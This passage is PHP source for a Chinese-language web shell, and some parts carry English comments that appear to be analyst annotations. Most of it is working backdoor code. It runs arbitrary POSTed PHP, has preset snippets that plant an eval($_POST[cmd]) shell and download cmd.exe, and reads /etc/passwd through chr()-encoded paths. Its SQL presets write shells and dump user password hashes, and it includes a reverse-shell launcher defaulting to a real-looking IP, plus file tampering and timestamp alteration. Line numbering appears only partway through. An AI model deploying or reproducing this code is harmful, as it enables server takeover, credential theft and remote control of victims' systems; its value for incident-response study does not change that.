      $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';
      $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';
      echo '<div class="msgbox">'.$msg.'</div>';
      echo '<form method="POST">';
      subeval();
      echo '<input type="hidden" name="go" id="go" value="scan">';
      echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
      echo '<tr><td>搜索路径</td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';
      echo '<tr><td>搜索内容</td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> (文件名或文件内容)</td></tr>';
      echo '<tr><td>文件后缀</td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> (用"|"分割, 为空则搜索所有文件)</td></tr>';
      echo '<tr><td>过滤目录</td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> (用"|"分割, 为空则不过滤目录)</td></tr>';
      echo '<tr><td>搜索方式</td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'>搜索文件名</label> ';
      echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'>搜索包含文字</label> ';
      // 'char' is passed as $chr to scanfile(), where the truthy branch is the case-INsensitive one
      echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'>匹配大小写</label></td></tr>';
      echo '<tr><td>搜索范围</td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>将搜索应用于该文件夹,子文件夹和文件</label> ';
      echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'>仅将搜索应用于该文件夹</label></td></tr>';
      echo '<tr><td>操作</td><td><input type="submit" style="width:80px;" value="搜索"></td></tr>';
      echo '</table></form>';
      if($keyword != '') {
          flush(); ob_flush();
          echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
          $incs = $include == '' ? false : explode('|',$include);
          $fits = $filters == '' ? false : explode('|',$filters);
          $isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);
          echo '<p>'.($isread ? '<h2>搜索完成</h2>' : '<h1>搜索失败</h1>').'</p></div>';
      }
      break;
  // "扫描后门" tab: lets the operator hunt competing web shells on the host.
  // The selected extension lists (POST types[]) are passed to antivirus() as
  // $exs; the regex signature lists in $matches are empty in this listing, so
  // the scan completes without reporting anything.
  case "antivirus" :
      $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
      $typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');
      echo '<div class="msgbox">'.$msg.'</div>';
      echo '<form method="POST">';
      subeval();
      echo '<input type="hidden" name="go" id="go" value="antivirus">';
      echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
      echo '<tr><td>扫描路径</td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> (采用正则匹配)</td></tr>';
      echo '<tr><td>查杀类型</td><td>';
      $types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');
      foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';
      echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="扫描"></td></tr>';
      echo '</table></form>';
      if(count($_POST['types']) > 0) {
          // signature database, keyed like $types; blank in this copy
          $matches = array(
              'php' => array( ),
              'asp+aspx' => array( ),
              'jsp' => array()
          );
          flush();
          ob_flush();
          echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
          $isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);
          echo '<p>'.($isread ? '<h2>扫描完成</h2>' : '<h1>扫描失败</h1>').'</p></div>';
      }
      break;
  // "执行PHP" tab: eval()s POST phpcode and shows the captured output. Code
  // wrapped in <? ... ?> is run as a template (eval('?>' . code . '<?php ')).
  // The echo base64_decode('') line is a blanked payload. The preset snippets
  // are worth noting for IR: one writes a one-liner eval($_POST[cmd]) shell to
  // C:/web/t00ls.php, one fetches http://www.baidu.com/cmd.exe into THISDIR,
  // and "find rootkit" reads (built from chr() codes) /etc/sh.conf,
  // /lib/libsh.so/shdcf and /etc/passwd — the first two presumably belong to
  // a rootkit the operator checks for. The "以HTML运行以上代码" button calls
  // runcode(), which is not defined in the <script> block of this listing.
  case "phpeval" :
      if(isset($_POST['phpcode'])) {
          $phpcode = chop($_POST['phpcode']);
          ob_start();
          if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }
          else { @eval ($phpcode); }
          $out = ob_get_contents();
          ob_end_clean();
      } else {
          $phpcode = 'phpinfo();';
          $out = '回显窗口';
      }
      echo base64_decode('');
      echo '<div class="msgbox">'.$msg.'</div>';
      echo '<form method="POST">';
      subeval();
      echo '<input type="hidden" name="go" id="go" value="phpeval">';
      echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';
      echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';
      echo '<option>---常用代码---</option>';
      echo '<option value="echo readfile(\'C:/web/t00ls.php\');">读取文件</option>';
      echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);">写入文件</option>';
      echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';">复制文件</option>';
      echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';">修改属性</option>';
      echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';">远程下载</option>';
      echo '<option value="print_r($_SERVER);">环境变量</option>';
      echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>';
      echo '</select> ';
      echo '<input type="submit" style="width:80px;" value="执行"></p></div>';
      echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="以HTML运行以上代码" onclick="runcode(\'evalcode\')"></p></div>';
      break;
  493. case "sql" :
  494. if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {
  495. $type = $_POST['type'];
  496. $sqlhost = $_POST['sqlhost'];
  497. $sqluser = $_POST['sqluser'];
  498. $sqlpass = $_POST['sqlpass'];
  499. $sqlname = $_POST['sqlname'];
  500. $sqlcode = $_POST['sqlcode'];
  501. $names = $_POST['names'];
  502. switch($type) {
  503. case "PostgreSql" :
  504. if(function_exists('pg_close')){
  505. if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }
  506. else { $sqlport = 5432; }
  507. $dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");
  508. if($dbconn) {
  509. $msg = '<h2>连接'.$type.'成功 </h2>';
  510. pg_query('set client_encoding='.$names);
  511. $result = pg_query($sqlcode);
  512. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }
  513. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('error' => pg_result_error($result)); }
  514. pg_free_result($result);
  515. } else {
  516. $msg = '<h1>连接'.$type.'失败</h1>';
  517. }
  518. @pg_close($dbconn);
  519. } else {
  520. $msg = '<h1>不支持'.$type.'</h1>';
  521. }
  522. break;
  523. case "MsSql" :
  524. if(function_exists('mssql_close')){
  525. $dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);
  526. if($dbconn) {
  527. $msg = '<h2>连接'.$type.'成功 </h2>';
  528. mssql_select_db($sqlname,$dbconn);
  529. $result = mssql_query($sqlcode);
  530. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }
  531. else { $msg .= '<h1> - 执行SQL失败</h1>'; }
  532. @mssql_free_result($result);
  533. } else {
  534. $msg = '<h1>连接'.$type.'失败</h1>';
  535. }
  536. @mssql_close($dbconn);
  537. } else {
  538. $msg = '<h1>不支持'.$type.'</h1>';
  539. }
  540. break;
  541. case "Oracle" :
  542. if(function_exists('oci_close')){
  543. $conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);
  544. if($conn) {
  545. $msg = '<h2>连接'.$type.'成功 </h2>';
  546. $stid = oci_parse($conn,$sqlcode);
  547. oci_execute($stid);
  548. if($stid) { $msg .= '<h2> - 执行SQL成功</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }
  549. else { $msg .= '<h1> - 执行SQL失败</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }
  550. oci_free_statement($stid);
  551. } else {
  552. $e = oci_error(); $rows = array('error' => $e['message']);
  553. $msg = '<h1>连接'.$type.'失败</h1>';
  554. }
  555. @oci_close($conn);
  556. } else {
  557. $msg = '<h1>不支持'.$type.'</h1>';
  558. }
  559. break;
  560. case "MySql" :
  561. if(function_exists('mysql_close')){
  562. $conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);
  563. if($conn) {
  564. $msg = '<h2>连接'.$type.'成功 </h2>';
  565. if(substr($sqlcode,0,6) == 't00lsa') {
  566. $array = array(); $data = ''; $i = 0;
  567. preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);
  568. if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {
  569. mysql_select_db($array[1][0],$conn);
  570. mysql_query('set names '.$names,$conn);
  571. $spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';
  572. $result = mysql_query($spidercode,$conn);
  573. if($result) {
  574. while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }
  575. if($data) {
  576. $file = strdir($array[4][0]);
  577. $msg .= filew($file,$data,'w') ? '<h2> - 脱库成功</h2>' : '<h1> - 导出文件失败</h1>';
  578. $rows = array('file' => $file,size(filesize($file)) => '共获取'.$i.'条数据');
  579. }
  580. else { $msg .= '<h1> - 没有数据</h1>'; }
  581. }
  582. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
  583. }
  584. else { $msg .= '<h1> - 脱库语句错误</h1>'; }
  585. } elseif(!empty($sqlcode)) {
  586. mysql_select_db($sqlname,$conn);
  587. mysql_query('set names '.$names,$conn);
  588. $result = mysql_query($sqlcode,$conn);
  589. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }
  590. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
  591. }
  592. mysql_free_result($result);
  593. } else {
  594. $msg = '<h1>连接'.$type.'失败</h1>';
  595. $rows = array('errno' => mysql_errno(),'error' => mysql_error());
  596. }
  597. mysql_close($conn);
  598. } else {
  599. $msg = '<h1>不支持'.$type.'</h1>';
  600. }
  601. break;
  602. }
  603. } else {
  604. $type = 'MySql';
  605. $sqlhost = 'localhost:3306';
  606. $sqluser = 'root';
  607. $sqlpass = '123456';
  608. $sqlname = 'mysql';
  609. $sqlcode = 'select version();';
  610. $names = 'gbk';
  611. }
  612. echo '<div class="msgbox">'.$msg.'</div>';
  613. echo '<form method="POST">';
  614. subeval();
  615. echo '<input type="hidden" name="go" id="go" value="sql">';
  616. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  617. echo '<tr><td>支持类型</td><td>';
  618. $dbs = array('MySql','MsSql','Oracle','PostgreSql');
  619. foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; }
  620. echo '</td></tr><tr><td>连接</td><td>地址 <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';
  621. echo '用户 <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';
  622. echo '密码 <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';
  623. echo '库名 <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';
  624. echo '<tr><td>语句<br>';
  625. echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';
  626. echo '<option value="select version();">---语句集合---</option>';
  627. echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';">写入文件</option>';
  628. echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;">开启外连</option>';
  629. echo '<option value="show variables;">系统变量</option>';
  630. echo '<option value="create database t00ls;">创建数据库</option>';
  631. echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">创建数据表</option>';
  632. echo '<option value="show databases;">显示数据库</option>';
  633. echo '<option value="show tables from `'.$sqlname.'`;">显示数据表</option>';
  634. echo '<option value="show columns from `t00ls`;">显示表结构</option>';
  635. echo '<option value="drop table `t00ls`;">删除数据表</option>';
  636. echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">显示字段</option>';
  637. echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');">插入数据</option>';
  638. echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;">修改数据</option>';
  639. echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">脱库(MySql)</option>';
  640. echo '</select>';
  641. echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';
  642. echo '<tr><td>操作</td><td><select name="names">';
  643. $charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');
  644. foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }
  645. echo '</select> <input type="submit" style="width:80px;" value="执行"></td></tr>';
  646. echo '</table></form>';
  647. if($rows) {
  648. echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';
  649. ob_start();
  650. print_r($rows);
  651. $out = ob_get_contents();
  652. ob_end_clean();
  653. if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GB2312//IGNORE',$out); }
  654. echo htmlspecialchars($out);
  655. echo '</pre>';
  656. }
  657. break;
  658. case "backshell" :
  659. if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
  660. $backip = $_POST['backip'];
  661. $backport = $_POST['backport'];
  662. $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
  663. $type = $_POST['type'];
  664. $msg = backshell($backip,$backport,$temp,$type);
  665. } else {
  666. $backip = '222.73.219.91';
  667. $backport = '443';
  668. $temp = '/tmp';
  669. $type = 'pl';
  670. }
  671. echo '<div class="msgbox">'.$msg.'</div>';
  672. echo '<form method="POST">';
  673. subeval();
  674. echo '<input type="hidden" name="go" id="go" value="backshell">';
  675. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  676. echo '<tr><td>反弹地址</td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';
  677. echo '<tr><td>反弹端口</td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';
  678. echo '<tr><td>临时目录</td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';
  679. echo '<tr><td>反弹方法</td><td>';
  680. $types = array('pl' => 'Perl','py' => 'Python','c' => 'C-bin','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS');
  681. foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }
  682. echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="反弹"></td></tr>';
  683. echo '</table></form>';
  684. break;
  685. case "edit" : case "editor" :
  686. $file = strdir($_POST['godir'].'/'.$_POST['govar']);
  687. $iconv = function_exists('iconv');
  688. if(!file_exists($file)) {
  689. $msg = '【新建文件】';
  690. } else {
  691. $code = filer($file);
  692. $chst = '默认';
  693. if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8','GB2312//IGNORE',$code); }
  694. $size = size(filesize($file));
  695. $msg = '【文件属性 '.substr(decoct(fileperms($file)),-4).'】 【文件大小 '.$size.'】 【文件编码 '.$chst.'】';
  696. }
  697. echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
  698. echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';
  699. echo '<form name="editfrm" id="editfrm" method="POST">';
  700. subeval();
  701. echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
  702. echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
  703. echo '<div class="actall">文件 <input type="text" name="filename" value="'.$file.'" style="width:528px;"> ';
  704. if($iconv) {
  705. echo '编码 <select name="tostr">';
  706. $selects = array('normal' => '默认','utf' => 'utf-8');
  707. foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($name == $chst ? ' selected' : '').'>'.$name.'</option>'; }
  708. echo '</select>';
  709. }
  710. echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';
  711. echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
  712. echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
  713. subeval();
  714. echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
  715. break;
  716. case "upfiles" :
  717. $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
  718. $msg = '【最大上传文件 '.get_cfg_var("upload_max_filesize").'】 【POST最大提交数据 '.get_cfg_var("post_max_size").'】';
  719. $max = 10;
  720. if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
  721. $uploads = $_FILES['uploads'];
  722. $msgs = array();
  723. for($i = 1;$i < $max;$i++) {
  724. if($uploads['error'][$i] == UPLOAD_ERR_OK) {
  725. $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
  726. $filea = $uploads['tmp_name'][$i];
  727. $fileb = strdir($updir.'/'.$rename);
  728. $msgs[$i] = fileu($filea,$fileb) ? '<br><h2>上传成功 '.$rename.'</h2>' : '<br><h1>上传失败 '.$rename.'</h1>';
  729. }
  730. }
  731. }
  732. echo '<div class="msgbox">'.$msg.'</div>';
  733. echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
  734. subeval();
  735. echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
  736. echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';
  737. for($i = 1;$i < $max;$i++) { echo '<p>附件'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;"> 重命名 <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }
  738. echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> ';
  739. echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';
  740. subeval();
  741. echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
  742. break;
  743. default :
  744. if(isset($_FILES['upfile'])) {
  745. if($_FILES['upfile']['name'] == '') { $msg = '<h1>请选择文件</h1>'; }
  746. else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>上传文件'.$rename.'成功</h2>' : '<h1>上传文件'.$rename.'失败</h1>'; }
  747. }
  748. if(isset($_POST['act'])) {
  749. switch($_POST['act']) {
  750. case "a" :
  751. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  752. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg = $msg = $i ? '<h2>共复制 '.$i.' 个文件到'.$_POST['var'].'成功</h2>' : '<h1>共复制 '.$i.' 个文件到'.$_POST['var'].'失败</h1>'; }
  753. break;
  754. case "b" :
  755. if(!$_POST['files']) { $msg = '<h1>请选择文件</h1>'; }
  756. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2>共删除 '.$i.' 个文件成功</h2>' : '<h1>共删除 '.$i.' 个文件失败</h1>'; }
  757. break;
  758. case "c" :
  759. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  760. elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1>属性值错误</h1>'; }
  761. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文件修改属性为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文件修改属性为'.$_POST['var'].'失败</h1>'; }
  762. break;
  763. case "d" :
  764. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  765. elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1>时间格式错误 '.$_POST['var'].'</h1>'; }
  766. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文件修改时间为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文件修改时间为'.$_POST['var'].'失败</h1>'; }
  767. break;
  768. case "e" :
  769. $path = strdir($nowdir.$_POST['var'].'/');
  770. if(file_exists($path)) { $msg = '<h1>目录已存在 '.$_POST['var'].'</h1>'; }
  771. else { $msg = @mkdir($path,0777) ? '<h2>创建目录 '.$_POST['var'].' 成功</h2>' : '<h1>创建目录 '.$_POST['var'].' 失败</h1>'; }
  772. break;
  773. case "f" :
  774. $context = array('http' => array('timeout' => 30));
  775. if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }
  776. $data = @file_get_contents ($_POST['var'],false,$stream);
  777. $filename = array_pop(explode('/',$_POST['var']));
  778. if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '<h2>下载 '.$filename.' 成功</h2>' : '<h1>下载 '.$filename.' 失败</h1>'; } else { $msg = '<h1>下载失败或不支持下载</h1>'; }
  779. break;
  780. case "rf" :
  781. $files = explode('|x|',$_POST['var']);
  782. if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }
  783. else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2>重命名 '.$files[1].' 为 '.$files[0].' 成功</h2>' : '<h1>重命名 '.$files[1].' 为 '.$files[0].' 失败</h1>'; }
  784. break;
  785. case "pd" :
  786. $files = explode('|x|',$_POST['var']);
  787. if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }
  788. else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>修改'.$files[1].'属性为'.$files[0].'成功</h2>' : '<h1>修改'.$files[1].'属性为'.$files[0].'失败</h1>'; }
  789. break;
  790. case "edit" :
  791. if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2>保存成功 '.$_POST['filename'].'</h2>' : '<h1>保存失败 '.$_POST['filename'].'</h1>'; }
  792. break;
  793. case "deltree" :
  794. $deldir = strdir($nowdir.$_POST['var'].'/');
  795. if(!file_exists($deldir)) { $msg = '<h1>目录 '.$_POST['var'].' 不存在</h1>'; }
  796. else { $msg = deltree($deldir) ? '<h2>删除目录 '.$_POST['var'].' 成功</h2>' : '<h1>删除目录 '.$_POST['var'].' 失败</h1>'; }
  797. break;
  798. }
  799. }
  800. $chmod = substr(decoct(fileperms($nowdir)),-4);
  801. if(!$chmod) { $msg .= ' - <h1>无法读取目录</h1>'; }
  802. $array = showdir($nowdir);
  803. $thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');
  804. $nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));
  805. echo '<div class="msgbox">'.$msg.'</div>';
  806. echo '<div class="actall"><form name="frm" id="frm" method="POST">';
  807. subeval();
  808. echo (is_writable($nowdir) ? '<h2>路径</h2>' : '<h1>路径</h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';
  809. echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> ';
  810. echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value="根目录"> ';
  811. echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value="程序目录"> ';
  812. echo '<select onchange="cd(options[selectedIndex].value);">';
  813. echo '<option>---特殊目录---</option>';
  814. echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';
  815. echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';
  816. echo '<option value="C:/Program Files/">Win-Program</option>';
  817. echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';
  818. echo '<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-启动</option>';
  819. echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';
  820. echo '<option value="/usr/local/">Linux-local</option>';
  821. echo '<option value="/tmp/">Linux-tmp</option>';
  822. echo '<option value="/var/tmp/">Linux-var</option>';
  823. echo '<option value="/etc/ssh/">Linux-ssh</option>';
  824. echo '</select></form></div><div class="actall">';
  825. echo '<input type="button" value="新建文件" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
  826. echo '<input type="button" value="创建目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
  827. echo '<input type="button" value="下载文件" onclick="txts(\'下载文件到当前目录\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';
